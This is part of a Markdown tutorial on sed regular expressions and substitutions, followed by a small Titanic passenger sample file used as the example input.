323 | - Zero or one Occurrence (\?)
324 | - Escaping the Special Character (\)
325 | - Character Class ([0-9])
326 | 
327 | 
328 | ```shell
329 | # display lines which start with 10:
330 | $ sed -n '/^10/ p' titanic.txt
331 | 
332 | # display lines which end with the letter S
333 | $ sed -n '/S$/ p' titanic.txt
334 | ```
335 | 
336 | #### 2. Additional Regular Expressions
337 | 
338 | - OR Operation (|)
339 | - Exactly M Occurrences ({m})
340 | - M to N Occurrences ({m,n})
341 | - Word Boundary (\b)
342 | - Back References (\n)
343 | 
344 | ```shell
345 | $ vi numbers.txt
346 | 1234
347 | 12123
348 | 121
349 | 12
350 | 
351 | $ sed -n '/[0-9]/ p' numbers.txt
352 | 1234
353 | 12123
354 | 121
355 | 12
356 | 
357 | # print lines consisting of exactly 5 digits
358 | $ sed -n '/^[0-9]\{5\}$/ p' numbers.txt
359 | 12123
360 | 
361 | # print lines consisting of at least 3 but not more than 5 digits
362 | $ sed -n '/^[0-9]\{3,5\}$/ p' numbers.txt
363 | 
364 | # match lines containing the whole word Mrs
365 | $ sed -n '/\bMrs\b/ p' titanic.txt
366 | 
367 | # match a two digit sequence in which both digits are the same, e.g. 11, 22, 33
368 | $ sed -n '/\([0-9]\)\1/ p' titanic.txt
369 | ```
370 | 
371 | #### 3. Sed Substitution Using Regular Expression
372 | 
373 | ```shell
374 | # replace the last two characters in every line with ",Not Defined"
375 | $ sed 's/..$/,Not Defined/' titanic.txt
376 | 
377 | # delete all lines that start with "#"
378 | $ sed 's/#.*// ; /^$/ d' titanic.txt
379 | 
380 | $ vi test.html
381 | <html><body>Hello World!</body></html>
382 | 
383 | # strip all html tags from test.html
384 | $ sed -e 's/<[^>]*>//g' test.html
385 | 
386 | # remove all comments and blank lines
387 | $ sed -e 's/#.*//' -e '/^$/ d' /etc/profile
388 | 
389 | # convert the DOS file format to Unix file format (remove the trailing \r from every line)
390 | $ sed 's/.$//' filename
391 | ```
392 | 
393 |
394 |
395 |
396 | 397 | ### Reference 398 | 399 | * [Sed-and-Awk-101-Hacks](https://www.yumpu.com/en/document/view/25827537/sed-and-awk-101-hacks) 400 | -------------------------------------------------------------------------------- /sed-awk/titanic.txt: -------------------------------------------------------------------------------- 1 | #titanic.txt 2 | PassengerId Survived Pclass Name Sex Age SibSp Parch Ticket Fare Cabin Embarked 3 | 01 0 3 "Braund_Mr.Owen_Harris" male 22 1 0 A/5_21171 7.25 Null S 4 | 02 1 1 "Cumings_Mrs.John_Bradley_(Florence_Briggs_Thayer)" female 38 1 0 PC_17599 71.2833 C85 C 5 | 03 1 3 "Heikkinen_Miss.Laina" female 26 0 0 STON/O2.3101282 7.925 Null S 6 | 04 1 1 "Futrelle_Mrs.Jacques_Heath_(Lily_May_Peel)" female 35 1 0 113803 53.1 C123 S 7 | 05 0 3 "Allen_Mr.William_Henry" male 35 0 0 373450 8.05 Null S 8 | 06 0 3 "Moran_Mr.James" male 34 0 0 330877 8.4583 Null Q 9 | 07 0 1 "McCarthy_Mr.Timothy_J" male 54 0 0 17463 51.8625 E46 S 10 | 08 0 3 "Palsson_Master.Gosta_Leonard" male 2 3 1 349909 21.075 Null S 11 | 09 1 3 "Johnson_Mrs.Oscar_W_(Elisabeth_Vilhelmina_Berg)" female 27 0 2 347742 11.1333 Null S 12 | 10 1 2 "Nasser_Mrs.Nicholas_(Adele_Achem)" female 14 1 0 237736 30.0708 Null C 13 | 11 1 3 "Sandstrom_Miss.Marguerite_Rut" female 4 1 1 PP_9549 16.7 G6 S 14 | 12 1 1 "Bonnell_Miss.Elizabeth" female 58 0 0 113783 26.55 C103 S 15 | 13 0 3 "Saundercock_Mr.William_Henry" male 20 0 0 A/5.2151 8.05 Null S 16 | 14 0 3 "Andersson_Mr.Anders_Johan" male 39 1 5 347082 31.275 Null S 17 | 15 0 3 "Vestrom_Miss.Hulda_Amanda_Adolfina" female 14 0 0 350406 7.8542 Null S 18 | 16 1 2 "Hewlett_Mrs.(Mary_D_Kingcome)_" female 55 0 0 248706 16 Null S 19 | 17 0 3 "Rice_Master.Eugene" male 2 4 1 382652 29.125 Null Q 20 | 18 1 2 "Williams_Mr.Charles_Eugene" male 28 0 0 244373 13 Null S 21 | 19 0 3 "Vander_Planke_Mrs.Julius_(Emelia_Maria_Vandemoortele)" female 31 1 0 345763 18 Null S 22 | 20 1 3 "Masselmani_Mrs.Fatima" female 33 0 0 2649 7.225 Null C 23 | #TITANIC titanic file is 
used to test titanic replace TITANIC 24 | 25 | --------------------------------------------------------------------------------